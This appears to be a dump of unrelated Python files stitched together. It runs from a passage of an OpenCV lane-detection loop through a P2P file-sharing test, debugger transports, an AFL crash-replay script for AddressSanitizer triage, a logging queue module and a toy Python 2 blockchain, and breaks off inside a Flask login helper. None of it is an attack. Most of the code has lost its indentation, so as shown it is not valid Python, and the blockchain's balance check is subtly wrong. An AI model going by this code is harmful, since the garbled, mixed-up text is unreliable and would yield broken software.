new_points = transform_point(points_xy, M)
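        # Heuristic lane selection: each warped lane gets a cubic fit x(y) with x and y
        # normalized to [0, 1]; the coefficient sum a+b+c+d is that polynomial evaluated
        # at y=1, i.e. the lane's normalized x position at the bottom of the bird's-eye
        # view. The candidates closest to the centre (0.5) on each side are kept as the
        # left and right lanes, and the average of the two curves is fed to the PID
        # steering controller below.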
ploynomial = []
left_lane = (1000,None)
right_lane = (1000,None)
for lanes in new_points:
lanes = lanes[(lanes[:,0]>=0)&(lanes[:,1]>=0)]
if lanes.shape[0]==0:
continue
ploynomial.append(np.polyfit(lanes[:,1]/400, lanes[:,0]/800, deg=3))
a,b,c,d = ploynomial[-1]
abcd = a+b+c+d
if abcd<0.5 and (0.5-abcd)<left_lane[0]:
left_lane = (0.5-abcd, ploynomial[-1])
if 0.5<abcd and (abcd-0.5)<right_lane[0]:
right_lane = (abcd-0.5, ploynomial[-1])
ratio = 1
if left_lane[0]!=1000 and right_lane[0]!=1000:
aa, bb, cc, dd = (left_lane[1]+right_lane[1])/2
if AUTOMODE:
# steer_dx = pid((aa*ratio**3+bb*ratio**2+cc*ratio+dd)*800)
steer_dx = pid((aa*ratio**3+bb*ratio**2+cc*ratio+dd)*800)
delay_process('steer', (steer_dx,))
for xx in range(400):
x = xx/400
a,b,c,d = left_lane[1]
y1 = np.floor((a*x**3+b*x**2+c*x+d)*800).astype(np.int32)
cv2.circle(black_bg, (y1, xx), 1, color=GREEN, thickness=1)
a,b,c,d = right_lane[1]
y2 = np.floor((a*x**3+b*x**2+c*x+d)*800).astype(np.int32)
cv2.circle(black_bg, (y2, xx), 1, color=GREEN, thickness=1)
y = np.floor((aa*x**3+bb*x**2+cc*x+dd)*800).astype(np.int32)
cv2.circle(black_bg, (np.floor(y).astype(np.int32), xx), 1, color=RED, thickness=1)
cv2.line(black_bg, (383,np.floor(400*ratio-10).astype(np.int32)), (383,np.floor(400*ratio).astype(np.int32)), color=ORANGE, thickness=2)
cv2.line(black_bg, (400,np.floor(400*ratio-10).astype(np.int32)), (400,np.floor(400*ratio).astype(np.int32)), color=ORANGE, thickness=2)
cv2.line(black_bg, (417,np.floor(400*ratio-10).astype(np.int32)), (417,np.floor(400*ratio).astype(np.int32)), color=ORANGE, thickness=2)
cv2.imshow('proce', black_bg)
black_bg = black_bg[:,200:-200,:]
black_bg = cv2.resize(black_bg, (90, 90))
# mix = cv2.cvtColor(mix, cv2.COLOR_BGR2BGRA)
# process = cv2.cvtColor(process, cv2.COLOR_BGR2BGRA)
w = 0.6
mix[-130:-40,-130:-40,:] = w*mix[-130:-40,-130:-40,:] + (1-w)*black_bg
# mix[40:130,-130:-40,:] = np.clip(mix[40:130,-130:-40,:] + process, None, 255)
# cv2.imshow('win', lane)
cv2.putText(mix, 'FPS:{:.2f}'.format(1/(time()-last_time)), (718, 29), cv2.FONT_HERSHEY_SIMPLEX, 0.5, WHITE)
cv2.imshow('ori', mix)
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
if SHUTDOWN:
cv2.destroyAllWindows()
break
if __name__ == "__main__":
main()
print('Normal exit.')
|
ComplexTest.py
|
import time
from threading import Thread
from PClient import PClient
tracker_address = ("127.0.0.1", 10086)
if __name__ == '__main__':
# A,B,C,D,E join the network
A = PClient(tracker_address, upload_rate=200000, download_rate=50000, name='A')
B = PClient(tracker_address, upload_rate=50000, download_rate=100000, name='B')
C = PClient(tracker_address, upload_rate=100000, download_rate=50000, name='C')
D = PClient(tracker_address, upload_rate=70000, download_rate=40000, name='D')
E = PClient(tracker_address, upload_rate=200000, download_rate=700000, name='E')
clients = [B, C, D, E]
    # A registers a file and B, C, D, E download it
fid = A.register("../test_files/bg.png")
threads = []
files = {}
# function for download and save
def download(node, index):
files[index] = node.download(fid)
time_start = time.time_ns()
for i, client in enumerate(clients):
threads.append(Thread(target=download, args=(client, i)))
# start download in parallel
for t in threads:
t.start()
# wait for finish
for t in threads:
t.join()
# check the downloaded files
with open("../test_files/bg.png", "rb") as bg:
bs = bg.read()
for i in files:
if files[i] != bs:
raise Exception("Downloaded file is different with the original one")
    # B, C, D, E have completed the download of the file
threads.clear()
F = PClient(tracker_address, upload_rate=50000, download_rate=100000, name='F')
G = PClient(tracker_address, upload_rate=100000, download_rate=60000, name='G')
# F, G join the network
clients = [F, G]
for i, client in enumerate(clients):
threads.append(Thread(target=download, args=(client, i)))
for t in threads:
t.start()
    # A cancels the file
time.sleep(20)
A.cancel(fid)
# B exits
time.sleep(10)
B.close()
# D exits
time.sleep(30)
D.close()
for t in threads:
t.join()
for i in files:
if files[i] != bs:
raise Exception("Downloaded file is different with the original one")
print("SUCCESS")
A.close()
C.close()
E.close()
F.close()
G.close()
print((time.time_ns() - time_start) * 1e-9)
|
transports.py
|
from __future__ import annotations
from ...typecheck import *
from ...import core
from ...dap import Transport
import socket
import os
import subprocess
import threading
class Process:
@staticmethod
async def check_output(command: list[str], cwd: str|None = None) -> bytes:
return await core.run_in_executor(lambda: subprocess.check_output(command, cwd=cwd))
def __init__(self, command: list[str], cwd: str|None = None):
# taken from Default/exec.py
# Hide the console window on Windows
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() #type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW #type: ignore
self.process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
shell=False,
bufsize=0,
startupinfo=startupinfo,
cwd = cwd)
self.stdin = self.process.stdin
self.stderr = self.process.stderr
self.stdout = self.process.stdout
self.closed = False
def _readline(self, pipe) -> bytes:
if l := pipe.readline():
return l
raise EOFError
def _read(self, pipe, n: int) -> bytes:
if l := pipe.read(n):
return l
raise EOFError
async def readline(self, pipe) -> bytes:
return await core.run_in_executor(lambda: self._readline(pipe))
async def read(self, pipe, nbytes) -> bytes:
return await core.run_in_executor(lambda: self._read(pipe, nbytes))
def dispose(self):
self.closed = True
try:
self.process.terminate()
except Exception as e:
core.log_exception()
class StdioTransport(Transport):
def __init__(self, log: core.Logger, command: List[str], cwd: Optional[str] = None):
log.log('transport', f'⟸ process/starting :: {command}')
self.process = Process(command, cwd)
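        # The child process's stderr is forwarded to the logger (log.info) on a
        # background thread so that reading it never blocks the transport itself.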
thread = threading.Thread(target=self._read, args=(self.process.stderr, log.info))
thread.start()
def _read(self, file: Any, callback: Callable[[str], None]) -> None:
while True:
try:
line = file.read(2**15).decode('UTF-8')
if not line:
core.log_info('Nothing to read from process, closing')
break
core.call_soon_threadsafe(callback, line)
except Exception as e:
core.log_exception()
break
self.process.dispose()
def write(self, message: bytes) -> None:
self.process.stdin.write(message)
self.process.stdin.flush()
def readline(self) -> bytes:
if l := self.process.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.process.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
self.process.dispose()
class SocketTransport(Transport):
def __init__(self, log: core.Logger, host: str, port: int, cwd: str|None = None):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((host, port))
self.stdin = self.socket.makefile('wb')
self.stdout = self.socket.makefile('rb')
def write(self, message: bytes) -> None:
self.stdin.write(message)
self.stdin.flush()
def readline(self) -> bytes:
if l := self.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
try:
self.socket.close()
except:
core.log_exception()
|
crashrunner.py
|
#!/usr/bin/python3
"""
Assume that we have conducted experiments with 30 repetitions and the folder is like:
/c/work/general/afl/exiv2/1/crashes
/c/work/general/afl/exiv2/2/crashes
...
/c/work/general/afl/exiv2/30/crashes
We can run the crashes to obtain ASAN output in the folder /c/ASAN_OUTPUT/c_work_general/{fuzzername}/{progname}/{repetition}/
# cd /c/work/general/afl
# find -type f|grep crashes/|grep -v README.txt > crasheslist.txt
# cat crasheslist.txt|CMD="/d/p/aflasan/exiv2 @@" /nfs/scripts/crashrunner.py
"""
import sys
import subprocess
import re
import os
import time
import glob
import shlex
import shutil
import threading
from time import sleep
MAX_THREADS = 10
os.environ["ASAN_OPTIONS"]='stack_trace_format="FUNCTIONSTARTFUNCTIONSTARTFUNCTIONSTART%fFUNCTIONENDFUNCTIONENDFUNCTIONEND_LOCATIONSTARTLOCATIONSTARTLOCATIONSTART%SLOCATIONENDLOCATIONENDLOCATIONEND_FRAMESTARTFRAMESTARTFRAMESTART%nFRAMEENDFRAMEENDFRAMEEND"'
def dprint(*args):
sys.stderr.write(" ".join([str(i) for i in args])+"\n")
def run_one_file(file, cmd, tmpfile, stdoutfile, stderrfile, timeoutfile, timeout=10):
"""
    Run the given file to produce stdoutfile and stderrfile.
    First, the file is copied to tmpfile,
    then @@ in cmd is replaced with tmpfile,
    and the output is saved to stdoutfile and stderrfile.
    If the run times out, timeoutfile is created.
    Return: (nottimeout, exitcode, runtime, outputtext)
    The caller must ensure that tmpfile is only used by the current thread
    and that the folder containing stdoutfile already exists.
"""
shutil.copy(file, tmpfile)
if "@@" in cmd:
cmds = shlex.split(cmd.replace("@@", tmpfile))
stdin = None
else:
cmds = shlex.split(cmd)
stdin = open(tmpfile, "rb")
nottimeout = True
if os.path.exists(timeoutfile):
os.unlink(timeoutfile)
starttime = time.time()
#dprint(cmds)
try:
        x = subprocess.run(cmds, stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=timeout)
exitcode = x.returncode
except subprocess.TimeoutExpired as e:
x = e
nottimeout = False
with open(timeoutfile, "w") as tmp:
tmp.write(file+"\n")
exitcode = -15 #SIGTERM
endtime = time.time()
runtime = endtime - starttime
outputtext = x.stdout.decode(errors="ignore")+"\n"+x.stderr.decode(errors="ignore")
with open(stdoutfile, "wb") as fp:
fp.write(x.stdout)
with open(stderrfile, "wb") as fp:
fp.write(x.stderr)
with open(stdoutfile.replace(".stdout", ".returncode"), "w") as fp:
fp.write(str(exitcode))
return (nottimeout, exitcode, runtime, outputtext)
FINISHED = 0
RESULT = {}
from db_crash_init_new import parse_asan
def getbugid(text, progname):
gccasan_vulntype,gccasan_full,gccasan_fullraw,gccasan_uniq,gccasan_1,gccasan_2,gccasan_3,gccasan_4,gccasan_5, bugid = parse_asan(text, progname)
return bugid
def thread_main(files, cmd, threadid, myname):
# in each thread, iteratively call run_one_file:
# run_one_file(file, cmd, tmpfile, stdoutfile, stderrfile, timeoutfile, timeout=10)
# tmpfile is calculated using myname and threadid
    # pathnames of the other output files are generated from the input file pathname,
# appending ".stdout", ".stderr", ".timeout" suffix respectively
global FINISHED, RESULT
usecache = not os.environ.get("NOCACHE", False)
pwd = os.getcwd()
for file in files:
# we will place output files to a folder under /c/ASAN_OUTPUT/
# this folder is generated solely from file pathname
# used as a cache folder, to speed up further analysis
# we ignore certain keywords to shorten output_folder name
#print(file)
f = file.split("/")
fname = f[-1]
blacklist = ["", ".", "output", "d", "crashes", "data1", "data2", "data3"]
if file.startswith(pwd):
# absolute path
prefix = "_".join([i for i in f[:-1] if i not in blacklist])
else:
# relative path
prefix = "_".join([i for i in pwd.split("/") if i not in blacklist]) + "/" + "/".join([i for i in f[:-1] if i not in blacklist])
#print(prefix)
output_folder = "/c/ASAN_OUTPUT/"+prefix+"/"
if not os.path.exists(output_folder):
os.makedirs(output_folder, exist_ok=True)
tmpfile = "/tmp/{myname}_{threadid}".format(**locals())
stdoutfile = output_folder+fname+".stdout"
stderrfile = output_folder+fname+".stderr"
timeoutfile = output_folder+fname+".timeout"
# res: (nottimeout, exitcode, runtime, outputtext)
if not os.path.exists(stdoutfile) or not usecache:
# do not read cache, run it!
res = run_one_file(file, cmd, tmpfile, stdoutfile, stderrfile, timeoutfile, timeout=10)
else:
nottimeout = not os.path.exists(timeoutfile)
exitcode = int(open(stdoutfile.replace(".stdout", ".returncode")).read())
runtime = -1
outputtext = open(stdoutfile, "r", errors="ignore").read()+"\n"+open(stderrfile, "r", errors="ignore").read()
res = (nottimeout, exitcode, runtime, outputtext)
RESULT[file] = res
if "AddressSanitizer" in res[3]:
print(file)
FINISHED += 1
if __name__ == "__main__":
FILES = [i for i in sys.stdin.read().split("\n") if i and os.path.isfile(i)]
if not FILES:
print("[Error] empty crash files? please check glob syntax!")
exit(1)
len_FILES = len(FILES)
dprint("Total files:", len_FILES)
cmd = os.environ.get("CMD", None)
if not cmd:
print("[Error] env CMD not given")
exit(1)
progpath = shlex.split(cmd)[0]
progname = progpath.split("/")[-1]
assert progname in ["base64", "exiv2", "ffmpeg", "flvmeta", "infotocap", "mp3gain", "mp42aac", "objdump", "pdftotext", "tcpdump", "tiffsplit", "uniq", "wav2swf", "who", "cflow", "gdk-pixbuf-pixdata", "imginfo", "jhead", "jq", "lame3.99.5", "mujs", "nm-new", "sqlite3"]
assert os.access(progpath, os.X_OK), "CMD program not executable?"
myname = "tmp_crashrunner_"+str(os.getpid())
threadN = min(MAX_THREADS, len_FILES)
for i in range(threadN):
t = threading.Thread(target=thread_main, args=[FILES[i::threadN], cmd, i, myname])
t.start()
while FINISHED < len_FILES:
#print("finished:", FINISHED, "/", len_FILES)
sleep(1)
foundbugids = set()
for name, value in RESULT.items():
text = value[3]
if "AddressSanitizer" in text:
foundbugids.add(getbugid(text, progname))
print("bugids:", sorted(list(foundbugids)))
for f in glob.glob("/tmp/"+myname+"*"):
os.unlink(f)
|
queue_channel.py
|
# Copyright (c) 2008-2013 by Vinay Sajip.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name(s) of the copyright holder(s) may not be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER(S) "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE COPYRIGHT HOLDER(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module contains classes which help you work with queues. A typical
application is when you want to log from performance-critical threads, but
where the handlers you want to use are slow (for example,
:class:`~logging.handlers.SMTPHandler`). In that case, you can create a queue,
pass it to a :class:`QueueHandler` instance and use that instance with your
loggers. Elsewhere, you can instantiate a :class:`QueueListener` with the same
queue and some slow handlers, and call :meth:`~QueueListener.start` on it.
This will start monitoring the queue on a separate thread and call all the
configured handlers *on that thread*, so that your logging thread is not held
up by the slow handlers.
Note that as well as in-process queues, you can use these classes with queues
from the :mod:`multiprocessing` module.
**N.B.** This is part of the standard library since Python 3.2, so the
version here is for use with earlier Python versions.
"""
import logging
try:
import Queue as queue
except ImportError:
import queue
import threading
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
:param queue: The queue to send `LogRecords` to.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses :meth:`~queue.Queue.put_nowait`. You may
want to override this method if you want to use blocking, timeouts or
custom queue implementations.
:param record: The record to enqueue.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
:param record: The record to prepare.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
:param record: The record to emit.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
    :param queue: The queue to listen to.
:param handlers: The handlers to invoke on everything received from
the queue.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses :meth:`~queue.Queue.get`. You may want to
override this method if you want to use timeouts or work with custom
queue implementations.
:param block: Whether to block if the queue is empty. If `False` and
the queue is empty, an :class:`~queue.Empty` exception
will be thrown.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
    def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
:param record: The record to prepare.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
:param record: The record to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
Writes a sentinel to the queue to tell the listener to quit. This
implementation uses ``put_nowait()``. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
class MutableQueueListener(QueueListener):
    def __init__(self, queue, *handlers):
        """
        Initialise an instance with the specified queue and
        handlers.
        """
        super(MutableQueueListener, self).__init__(queue, *handlers)
        # Changing this to a list from a tuple in the parent class
        self.handlers = list(handlers)
def addHandler(self, handler):
if handler not in self.handlers:
self.handlers.append(handler)
def removeHandler(self, handler):
if handler in self.handlers:
self.handlers.remove(handler)
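# Minimal usage sketch (added for illustration, not part of the original module): it
# wires a QueueHandler and a QueueListener together as described in the module
# docstring. The handler choice (StreamHandler to stderr) and the logger name are
# illustrative assumptions only.
if __name__ == '__main__':
    import sys
    demo_queue = queue.Queue(-1)  # unbounded in-process queue
    listener = QueueListener(demo_queue, logging.StreamHandler(sys.stderr))
    listener.start()  # the (slow) handlers now run on the listener's thread
    demo_logger = logging.getLogger('queue_channel_demo')
    demo_logger.addHandler(QueueHandler(demo_queue))
    demo_logger.setLevel(logging.INFO)
    demo_logger.propagate = False  # keep the demo output on the queue path only
    demo_logger.info('hello from the queue-based logging demo')
    listener.stop()  # enqueue the sentinel, drain the queue and join the thread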
|
blockchain.py
|
# Specter BlockChain Implementation
# Nick Frichette 12/9/2017
import json
import hashlib
import requests
import base64
from threading import Thread
from database_orm import *
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.exceptions import InvalidSignature
# ANSI escape sequences
FAIL = '\033[91m'
END = '\033[0m'
OK = '\033[92m'
class Blockchain:
NODE_ADDRESS_LIST = ['http://localhost:5000']
blocks = []
index = 0
db = None
transaction_pool = []
def __init__(self, is_node=False):
# Instantiate DB
self.db = Database()
if is_node:
print OK + 'Thank you for standing up a node!' + END
# If the DB is empty, generate the Genesis
if self.db.is_empty():
print FAIL + 'No blocks in chain' + END
print OK + 'Creating Genesis Block' + END
genesis = self.make_genesis_block()
self.add_block(genesis)
else:
# For each row in the DB, create a block
blocks = self.db.get_all_blocks()
for item in blocks:
block = Block(
item.coin_index,
json.loads(item.transaction_info),
item.previous_hash,
item.current_hash,
item.timestamp,
item.nonce
)
self.add_block(block)
# Unverified transactions are added to the transaction pool
# A separate thread will put them onto the block chain.
            # This should be more performant at scale.
#trans_thread = Thread(target=self.transaction_thread)
#trans_thread.daemon = true
#trans_thread.start()
else:
# This is an implementation meant for normal users
try:
blockchain_json = self.download_blockchain()
self.unjsonify(blockchain_json)
except requests.exceptions.ConnectionError:
print FAIL + "Failed to connect to nodes. Terminating" + END
exit()
def download_blockchain(self):
# Query the nodes for the blockchain
# In the future validation will need to occur
blockchain_json = []
for address in self.NODE_ADDRESS_LIST:
request = requests.get(address + '/getblockchain')
blockchain_json = request.json()
return blockchain_json
def update_blockchain(self):
try:
blockchain_json = self.download_blockchain()
self.blocks = []
self.unjsonify(blockchain_json)
except requests.exceptions.ConnectionError:
print "Failed to update blockchain"
def jsonify(self):
data_json = {}
i = 0
for block in self.blocks:
data = {
"index": block.coin_index,
"transaction": block.transaction_info,
"previous_hash": block.previous_hash,
"current_hash": block.current_hash,
"timestamp": block.timestamp,
"nonce": block.nonce
}
data_json[i] = data
i += 1
return data_json
def unjsonify(self, json_data):
for block in json_data:
js = json_data[block]
block = Block(
js['index'],
js['transaction'],
js['previous_hash'],
js['current_hash'],
js['timestamp'],
js['nonce']
)
self.blocks.append(block)
# If not in the DB, insert it
#if not self.db.in_db(block):
# self.db.insert_block(block)
return None
def print_chain(self):
print self.blocks
return self.blocks
def add_block(self, block):
if not self.db.in_db(block):
self.db.insert_block(block)
self.blocks.append(block)
def make_block(self, transaction):
self.index += 1
# Error handling to fix serialization issues
transaction['amount'] = int(transaction['amount'])
block_hash = self.calc_block_hash(self.index, transaction['hash'], transaction['timestamp'], transaction, 0)
block = Block(self.index, transaction, transaction['hash'], block_hash, transaction['timestamp'], 0)
self.add_block(block)
def make_genesis_block(self):
print OK + 'Genesis Block Created' + END
transaction = {
"from": "-1",
"to": "MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAupSwIG17vricebp6EN88"+
"7wzHj0OsaxYl24z2VT6U9+ByEoGGWOPC/Nv9jwebzCLT49Bv5nZL0c7WCQMvvb5o"+
"3BNk2wPZR6XEQBZxgwXJdt5h2Ye+Nyc8wYvZodp1ouUv2jCNvcnH4VCz6y56yPzc"+
"861ZeYGGO9xbTu7RLkBqGODIqNqLzRhIdpYDukz2TVgHrEXalu+SFkrHo+oc5OBg"+
"YYLQeOSlzRKxgfvFG9ViNlqHP0tQDQsGnakBFuBWW5DuwrEKjqkmM+dxo9ALNaag"+
"ELpB60zXK2ZxwdvOmko8KZNsHVQMzZql2hcJiyfc99OvOBgp/xTscK94NNqQ6m2M"+
"pFr8V07XFnRB8r1EQhY9oFuraUi9xSZbKc3DVG3FEfSyo2Q/+jT+9dkSt7GegIya"+
"wM3saOY2VeN1f8XsfQ+a96SL+ltas99NlDJGMuOJOjrKherpfEBcuEK5EvljceGy"+
"b7O4NyUcQ/k0q/ngQM+Lz5/3RUShqCbtkmjH5FAxiNHzluy83hJyxGxrYHTEMF88"+
"Z6YHyaOBUpMp3mvPMVqM/jeI2aslJDTEDmeaRhs6yI90RDyohzb1FUctUKVPiL8a"+
"FI9/gKmSCpgB8BEpI23K0az4kbItnWLe3xzABSFL0nSQWkXQqWmepKcDwp6TcJtG"+
"/U5BSE284qlQFOd50rW0xRUCAwEAAQ==",
"amount": 100,
"signature": "-1",
"timestamp": -1,
"hash": -1
}
current_hash = self.calc_block_hash(0, -1, -1, transaction, 0)
genesis_block = Block(0, transaction, -1, current_hash, 0, 0)
self.index += 1
return genesis_block
def calc_block_hash(self, index, prev_hash, timestamp, transaction, nonce=0):
data = {
"index": index,
"previous_hash": prev_hash,
"timestamp": timestamp,
"transaction": transaction,
"nonce": nonce
}
data_json = json.dumps(data, sort_keys=True)
hashed = hashlib.sha256(data_json)
return hashed.hexdigest()
def lookup_address(self, address):
# Begin searching for transactions from that address
balance = 0
for block in self.blocks:
if block.transaction_info['from'] == address:
balance -= block.transaction_info['amount']
if block.transaction_info['to'] == address:
balance += block.transaction_info['amount']
return balance
def validate_transaction(self, transaction):
# We need to ensure that a transaction is valid on the blockchain
        # First let's get the amount the user wants to move
amount = int(transaction['amount'])
# Now let's check their balance with their public key
balance = self.lookup_address(transaction['from'])
# Now compare the two
if amount < balance:
return True
else:
return False
@staticmethod
def create_signable_transaction(from_address, to_address, amount, timestamp):
return ':'.join((from_address, to_address, amount, str(timestamp)))
def authenticate_transaction(self, transaction):
is_verified = self.verify_remote_transaction(transaction['from'], transaction['signature'], transaction)
return is_verified
def verify_remote_transaction(self, public_key, signature, transaction):
# transaction.pop('hash')
transaction = self.create_signable_transaction(
transaction['from'],
transaction['to'],
transaction['amount'],
transaction['timestamp']
)
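        # Re-wrap the raw base64 public key into PEM format (64 characters per line
        # between BEGIN/END PUBLIC KEY markers) so the cryptography backend can load it.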
key = "-----BEGIN PUBLIC KEY-----\n"
i = 0
while i < len(public_key):
key += public_key[i:i+64]+'\n'
i += 64
key += "-----END PUBLIC KEY-----\n"
public_key = serialization.load_pem_public_key(
str(key),
backend=default_backend()
)
try:
public_key.verify(
bytes(base64.decodestring(signature)),
bytes(transaction),
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
return True
except InvalidSignature:
return False
#def transaction_thread(self):
# while true:
# while len(self.transaction_pool) > 0:
# transaction = self.transaction_pool[-1]
# if self.authenticate_transaction(transaction):
# if self.validate_transaction(transaction):
# print str(len(self.blocks))
# print OK + "Confirmed Transaction" + END
# self.make_block(self.transaction_pool.pop())
# print str(len(self.blocks))
def add_transaction_to_pool(self, transaction):
#self.transaction_pool.append(transaction)
if self.authenticate_transaction(transaction):
if self.validate_transaction(transaction):
self.make_block(transaction)
if __name__ == '__main__':
blockchain = Blockchain()
|
web.py
|
# -*- coding: utf-8 -*-
"""
utils.web
~~~~~~~~~
Some web app tool classes and functions.
:copyright: (c) 2019 by staugur.
:license: BSD 3-Clause, see LICENSE for more details.
"""
import json
import imghdr
from posixpath import basename, splitext
from os import remove
from os.path import join as pathjoin, getsize
from io import BytesIO
from functools import wraps
from base64 import urlsafe_b64decode as b64decode, b64decode as pic64decode
from binascii import Error as BaseDecodeError
from redis.exceptions import RedisError
from requests.exceptions import RequestException
from flask import (
g,
redirect,
request,
url_for,
abort,
Response,
jsonify,
current_app,
make_response,
Markup,
)
from jinja2 import Environment, FileSystemLoader
from sys import executable
from functools import partial
from subprocess import call, check_output
from itsdangerous import (
TimedJSONWebSignatureSerializer as Serializer,
SignatureExpired,
BadSignature,
)
from tempfile import NamedTemporaryFile
from libs.storage import get_storage
from .tool import (
logger,
get_current_timestamp,
rsp,
sha256,
username_pat,
parse_valid_comma,
parse_data_uri,
format_apires,
url_pat,
ALLOWED_EXTS,
parse_valid_verticaline,
parse_valid_colon,
is_true,
is_venv,
gen_ua,
check_to_addr,
is_all_fail,
bleach_html,
try_request,
comma_pat,
create_redis_engine,
allowed_file,
parse_label,
ALLOWED_VIDEO,
b64size,
)
from ._compat import PY2, text_type, urlsplit, parse_qs
from threading import Thread
if not PY2:
from functools import reduce
rc = create_redis_engine()
no_jump_ep = ("front.login", "front.logout", "front.register")
def get_referrer_url():
"""获取上一页地址"""
if (
request.method == "GET"
and request.referrer
and request.referrer.startswith(request.host_url)
and request.endpoint
and "api." not in request.endpoint
and request.endpoint not in no_jump_ep
):
url = request.referrer
else:
url = None
return url
def get_redirect_url(endpoint="front.index"):
"""获取重定向地址"""
url = request.args.get("next")
if not url:
if endpoint != "front.index":
url = url_for(endpoint)
else:
url = (
get_referrer_url()
or (request.full_path if request.endpoint not in no_jump_ep else None)
or url_for(endpoint)
)
return url
def default_login_auth(dSid=None):
"""默认登录解密
:returns: (signin:boolean, userinfo:dict)
"""
sid = request.cookies.get("dSid") or dSid or ""
signin = False
userinfo = {}
try:
if not sid:
raise ValueError
if PY2 and isinstance(sid, text_type):
sid = sid.encode("utf-8")
sid = b64decode(sid)
if not PY2 and not isinstance(sid, text_type):
sid = sid.decode("utf-8")
usr, expire, sha = sid.split(".")
expire = int(expire)
except (TypeError, ValueError, AttributeError, Exception):
pass
else:
if expire > get_current_timestamp():
ak = rsp("accounts")
pipe = g.rc.pipeline()
pipe.sismember(ak, usr)
pipe.hgetall(rsp("account", usr))
try:
result = pipe.execute()
except RedisError:
pass
else:
if isinstance(result, (tuple, list)) and len(result) == 2:
has_usr, userinfo = result
if has_usr and userinfo and isinstance(userinfo, dict):
pwd = userinfo.pop("password", None)
if (
sha256(
